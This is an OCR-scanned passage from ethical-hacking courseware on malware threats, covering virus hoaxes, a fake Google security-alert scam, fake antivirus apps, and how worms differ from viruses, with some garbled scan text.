Ole1111Virus .,,-__ Antlvln.Hl
¼•• ••
..
-- __:.::;�t:!::.--
viruses and other malicious programs �� ,,, , ,,,.,,
• Virus Hoaxes
• Fake Antivirus
Virus Hoaxes
Techniques such as virus hoaxes and fake antivirus software are widely used by attackers to
introduce viruses into victims' systems.
Virus hoaxes can be nearly as harmful as real viruses in terms of loss of productivity and
bandwidth while naive users react to them and forward them to other users. Because viruses
tend to create considerable fear, they have become a common subject of hoaxes. Virus hoaxes
are false alarms claiming reports of nonexistent viruses.
The following are some critical features of virus hoaxes:
• These warning messages, which can be rapidly propagated, state that a particular e-mail
message should not be opened, and that doing so would damage one's system.
• In some cases, these warning messages themselves contain virus attachments.
Try to crosscheck the identity of the person who has posted the warning.
It is a good practice to look for technical details in any message concerning viruses.
Furthermore, search for information on the Internet to learn more about hoaxes, especially by
scanning bulletin boards on which people actively discuss current community
happenings/concerns. Before jumping to conclusions by reading Internet information, first,
check the following:
■ If the information is posted by newsgroups that are suspicious, cross-check the
information with another source.
• If the person who has posted the news is not an expert or a known person in the
community, crosscheck the information with another source.
• If a government body has posted the news, the posting should also have a reference to
the corresponding federal regulation.
• One of the most effective checks is to look up the suspected hoax virus by name on
antivirus software vendor sites.
Google Critical Security Alert Scam:
In 2018, a massive hoax campaign was launched, in which threat actors spread Google Critical
Security Alert messages to victims. Google Critical Security Alert is a service provided by Google
to notify its users regarding any activity related to their accounts. The activities can include
logging in, changing passwords, changing personal information, etc. Attackers create and send
fake alert emails to victims, thereby notifying them that the aforementioned activities have
taken place. By looking at the critical alert email, the user clicks the link provided in the email
and subsequently gets infected. The figure below describes a hoax email stating "New device
signed in to." By looking at this email without noting the email source, the victim clicks the
"CHECK ACTIVITY" button and gets trapped.
Google 9Apr
tome •
Go gle
Your Google Account was just signed in to from a new Windows device. You're getting this
email to make sure that ii was you.
I CMECK ACTIVITY
You ,ecelved this en,ail 10 let you know about Important changes 10 your Google Account and services
� 2018 Google Inc .1600 Amphitheatre Parkway. Mountain Vle,e CA 94043. USA
Upon clicking the ad, pop-up, or link to install the antivirus software, users are redlrected to
another page where they are prompted to buy or subscribe to that antivirus software by
entering their payment details. Fake antivirus software can cause severe damage to systems
once downloaded and installed; e.g., they infect systems with malicious software, steal
sensitive information (e.g., passwords, bank account numbers, credit card data), and corrupt
files.
Ethical Hacking and Countermeasures
Matwarc;.Thrcats
At present, a new fake antivirus trend has emerged. Fake antivirus tools are rapidly
proliferating the mobile application space. According to AV-Comparatives research, two-thirds
of all antivirus applications present in the Android Play Store are fake.
• Free Antivirus 2019
Free Antivirus 2019 is a fake Android antivirus application. It is intended to eliminate
viruses and other malware from mobile devices. However, when it is scanned by itself, it
is indicated as a Medium Risk, as shown in the screenshot below.
o • :.1 a 10:21
� Google Play
Computer Worms
-.I Computer worms are malicious programs How is a Worm Different from a Virus?
that Independently replicate, execute, and
spread across the network connections,
A Wonn Replicates on its own
thus consuming available computing resources
without human interaction
A worm is a special type of malware that can
.l Attackers use worm payloads to Install backdoors replicate itself and use memory but cannot attach
in infected computers, which turns them into itself to other programs
tombles and creates a botnet; these botnets can
be used to perform further cyber attacks J A Worm Spreads through the Infected Network
Computer Worms
Computer worms are standalone malicious programs that replicate, execute, and spread across
network connections independently without human intervention. lntr.uders design most worms
to replicate and spread across a network, thus consuming available computing resources and, in
turn, causing network servers, web servers, and individual computer systems to become
overloaded and stop responding. However, some worms also carry a payload to damage the
host system.
Worms are a subtype of viruses. A worm does not require a host to replicate; however, in some
cases, the worm's host machine is also infected. Initially, black hat professionals treated worms
as a mainframe problem. Later, with the introduction of the Internet, they mainly focused on
and targeted Windows OS using the same worms by sharing them in via e-mail, IRC, and other
network functions.
Attackers use worm payloads to install backdoors on infected computers, which turns them
into zombies and creates a botnet. Attackers use these botnets to initiate cyber-attacks. Some
of the latest computer worms are as follows:
• Manero
• Bondat
• Beapy
Ethical Hacking and Countermeasures
Matwarc;.Thrcats
Virus Worm
A virus infects a system by inserting itself A worm infects a system by exploiting a vulnerability
into a file or executable program in an OS or application by replicating itself
It might delete or alter the content of files or Typically, a worm does not modify any stored
change the location of files in the system programs; it only exploits the CPU and memory
It alters the way a computer system It consumes network bandwidth, system memory,
operates without the knowledge or consent etc., excessively overloading servers and computer
of a user systems
A virus cannot spread to other computers A worm can replicate itself and spread using IRC,
unless an infected file is replicated and sent Outlook, or other applicable mailing programs after
to the other computers installation in a system
A virus spreads at a uniform rate, as
A worm spreads more rapidly than a virus
programmed
Viruses are difficult to remove from infected Compared with a virus, a worm can be removed
machines easily from a system
Table 7.4: Difference between virus and worm